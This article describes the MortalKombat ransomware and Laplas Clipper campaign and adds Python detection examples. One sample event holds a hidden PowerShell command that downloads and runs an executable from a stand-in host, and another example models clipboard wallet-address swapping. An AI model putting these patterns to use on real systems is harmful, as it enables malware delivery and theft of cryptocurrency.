MortalKombat Ransomware Chains Multi-Stage Attacks To Score A Fatality On Your Data

Mortal Kombat has a reputation for being brutal, but rather than exacting excessive violence on video game characters, unknown threat actors are brazenly brutalizing their victims’ finances in a Mortal Kombat-themed ransomware campaign. Aside from ransomware, this campaign also makes use of the Laplas Clipper malware, which sneakily swaps out cryptocurrency wallet addresses to direct funds to the threat actors.

MortalKombat ransomware campaign kill chain (source: Talos)

According to cybersecurity researchers at Cisco’s Talos Intelligence Group, this financially-motivated threat campaign began in December 2022 and is still ongoing. The campaign’s kill chain starts with phishing emails impersonating the legitimate cryptocurrency payment gateway CoinPayments. The emails falsely inform recipients that CoinPayments never received sufficient funds to complete scheduled transactions, prompting recipients to download, extract, and open an attached file presented as an invoice.

The extracted attachment is a batch file that acts as a loader. The researchers found two versions of it: one downloads and executes the MortalKombat ransomware, the other downloads and executes the Laplas Clipper malware. Laplas Clipper is a clipboard stealer, but rather than exfiltrating everything copied to the clipboard, it quietly watches the clipboard of the infected system for cryptocurrency wallet addresses.
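The delivery stage described above (a batch file extracted from an e-mail attachment that fetches and runs a second stage) leaves a recognisable process tree. The following is an added detection example, not Talos's tooling: it runs over constructed process-creation events whose field names mimic Sysmon Event ID 1, and flags a `cmd.exe` that runs a `.bat`/`.cmd` from a user-writable location and then spawns a built-in download tool. The list of download tools and the path heuristic are assumptions for illustration.

```python
"""Added example (not Talos's code): flag a batch-file loader that downloads
a second stage, using constructed Sysmon-style process-creation events."""
import re
from pathlib import PureWindowsPath

# Assumed heuristics: where an extracted e-mail attachment typically lands,
# and built-in tools a one-line batch loader commonly uses to fetch a payload.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(?:Downloads|Desktop|AppData)\\|\\Temp\\", re.I)
DOWNLOADERS = {"powershell.exe", "curl.exe", "certutil.exe", "bitsadmin.exe", "mshta.exe"}
# Quoted path (may contain spaces) or bare token ending in .bat/.cmd.
BATCH_ARG = re.compile(r'"([^"]+\.(?:bat|cmd))"|(\S+\.(?:bat|cmd))\b', re.I)

# Constructed events, not real telemetry. example.invalid is a reserved name.
SAMPLE_EVENTS = [
    {"ProcessGuid": "A", "ParentProcessGuid": "0", "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe", "User": r"CORP\alice"},
    {"ProcessGuid": "B", "ParentProcessGuid": "A", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "C:\Users\alice\Downloads\invoice\Invoice_2022-12.bat"',
     "User": r"CORP\alice"},
    {"ProcessGuid": "C", "ParentProcessGuid": "B",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iwr http://example.invalid/p.exe -OutFile $env:TEMP\p.exe; Start-Process $env:TEMP\p.exe"',
     "User": r"CORP\alice"},
    # Benign: a build script under Program Files that also calls curl.
    {"ProcessGuid": "D", "ParentProcessGuid": "A", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "C:\Program Files\Build\build.bat"', "User": r"CORP\alice"},
    {"ProcessGuid": "E", "ParentProcessGuid": "D", "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -O https://example.invalid/deps.zip", "User": r"CORP\alice"},
]


def _basename(image):
    return PureWindowsPath(image).name.lower()


def find_batch_download_chains(events):
    """Return one hit per download tool whose parent is cmd.exe running a
    batch file located in a user-writable directory."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    hits = []
    for e in events:
        if _basename(e["Image"]) not in DOWNLOADERS:
            continue
        parent = by_guid.get(e["ParentProcessGuid"])
        if parent is None or _basename(parent["Image"]) != "cmd.exe":
            continue
        m = BATCH_ARG.search(parent["CommandLine"])
        if not m:
            continue
        batch = m.group(1) or m.group(2)
        if not USER_WRITABLE.search(batch):
            continue  # e.g. a scheduled build script under Program Files
        hits.append({"user": e["User"], "batch": batch, "child": e["CommandLine"]})
    return hits


if __name__ == "__main__":
    for hit in find_batch_download_chains(SAMPLE_EVENTS):
        print(f"[ALERT] {hit['user']}: {hit['batch']} -> {hit['child']}")
```

The benign build script is deliberately included: the signal is not "batch file spawns curl" but "batch file from a location a phished user writes to spawns a downloader", which keeps the rule from paging on every developer workstation.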

Once Laplas Clipper detects a wallet address in the clipboard, it uploads that address to a server controlled by the threat actors and receives back a similar-looking address belonging to the attackers. The malware then overwrites the clipboard contents with the returned address. The victim pastes this second address, believing it to be the one they copied, and any funds sent to it land in the threat actors' wallet instead of the intended destination.
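To make the swap concrete, the following is an added model of the clipper logic described above, written for this page and not derived from Laplas code. The server round-trip is simulated by a local lookup that picks, from a constructed attacker pool, the address sharing the longest prefix and suffix with the victim's (the characters a person actually eyeballs). The address patterns are simplified and do not verify checksums, and all addresses are constructed, not real. It also includes the defensive check a wallet application or endpoint agent can apply: compare what was copied with what is about to be pasted.

```python
"""Added example (not Laplas code): model of a clipboard-swapping clipper plus
the copy-vs-paste check that catches it. All addresses are constructed."""
import os
import re

# Simplified patterns (assumption: illustrative only, no checksum validation).
ADDRESS_PATTERNS = {
    "btc-legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc-bech32": re.compile(r"^bc1[ac-hj-np-z02-9]{25,62}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}

# Constructed attacker wallet pool, keyed by address type.
ATTACKER_POOL = {
    "btc-legacy": ["1Kx7bN8eF2qR5tY9wA3zC6vB4mD7nH1kLU",
                   "1Ab2Cd3Ef4Gh5Jk6Mn7Pq8Rs9Tu1Vw2XyZ"],
    "btc-bech32": ["bc1qx9y8z7" + "a" * 28 + "f0ec"],
    "eth": ["0xA1b2deadbeef00112233445566778899aAbBcD3e",
            "0x0000000000000000000000000000000000000001"],
}

# Constructed victim addresses used in the demo below.
VICTIM_BTC = "1Kx7aQ2mD9vPf4RtW3sHn8cY6bZjL5eGqU"
VICTIM_ETH = "0xA1b2C3d4E5f60718293A4b5C6d7E8F9a0B1c2D3e"


def classify(text):
    """Return the address type of a clipboard string, or None if it is not one."""
    text = text.strip()
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return kind
    return None


def similarity(a, b):
    """Characters shared at the start plus at the end: what a victim glances at."""
    prefix = len(os.path.commonprefix([a, b]))
    suffix = len(os.path.commonprefix([a[::-1], b[::-1]]))
    return prefix + suffix


def fake_c2_lookup(victim_addr, kind):
    """Stand-in for the server round-trip: the attacker address of the same
    type that most resembles the victim's."""
    return max(ATTACKER_POOL[kind], key=lambda cand: similarity(victim_addr, cand))


def clipper_transform(clipboard):
    """What the clipper writes back. Non-address text is left untouched,
    which is why this class of malware stays quiet on a typical desktop."""
    kind = classify(clipboard)
    if kind is None:
        return clipboard
    return fake_c2_lookup(clipboard.strip(), kind)


def swap_suspected(copied, pasted, threshold=4):
    """Defensive check: same address type, different value, matching ends."""
    kind = classify(copied)
    return (kind is not None and classify(pasted) == kind
            and copied != pasted and similarity(copied, pasted) >= threshold)


if __name__ == "__main__":
    for original in (VICTIM_BTC, VICTIM_ETH, "meeting notes"):
        swapped = clipper_transform(original)
        print(f"{original!r} -> {swapped!r} suspicious={swap_suspected(original, swapped)}")
```

The check deliberately keys on the ends of the address being equal while the middle differs: that is exactly the property a look-alike address is chosen for, so it separates a swap from a user who simply copied two different addresses in a row.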

MortalKombat ransomware desktop background and ransom note (source: Talos)

As for the MortalKombat ransomware itself, it appears to be a new variant of the older Xorist ransomware family. The researchers observed it encrypting a wide range of file types, including some system, application, and backup files. It does not delete volume shadow copies, so where those are enabled they remain a possible recovery path; it does, however, corrupt the contents of the recycle bin, empty the startup folder, disable the Windows Run command window, and delete a root registry key, rendering installed applications inoperable.

Once the damage is done, MortalKombat executes its finishing move: it replaces the desktop background with ransom instructions overlaid on Mortal Kombat 11's cover art and drops a ransom note text file. Both the desktop background and the ransom note instruct victims to download and install the qTOX instant messenger (a client for the peer-to-peer, end-to-end encrypted Tox protocol) to communicate with the threat actors. The ransom note also tells victims how to purchase cryptocurrency to pay the ransom. So far, the threat actors behind this campaign appear to limit their extortion to decrypting files stored locally on victims' machines, rather than attempting double extortion by threatening to publish stolen files on a dedicated leak site.